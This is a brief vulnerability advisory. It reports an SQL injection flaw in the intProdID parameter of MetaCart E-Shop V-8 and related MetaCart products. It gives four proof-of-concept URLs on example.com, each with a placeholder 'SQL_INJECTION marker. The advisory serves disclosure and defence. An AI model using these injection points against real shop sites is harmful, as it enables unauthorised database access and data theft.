MetaCart E-Shop V-8 IntProdID Parameter Remote SQL Injection Vulnerability

MetaCart E-Shop V-8 IntProdID Parameter Remote SQL Injection Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/eshopv-8/product.asp?intProdID='SQL_INJECTION&amp%3bstrCatalog_NAME=&amp%3bstrSubCatalog_NAME=&amp%3bstrSubCatalogID=&amp%3bintCatalogID=10001&amp%3bCurCatalogID=
http://www.example.com/mcart2pfp/product.asp?intProdID='SQL_INJECTION
http://www.example.com/mcart2sqluk/product.asp?intProdID='SQL_INJECTION
http://www.example.com/mcart2pal/product.asp?intProdID='SQL_INJECTION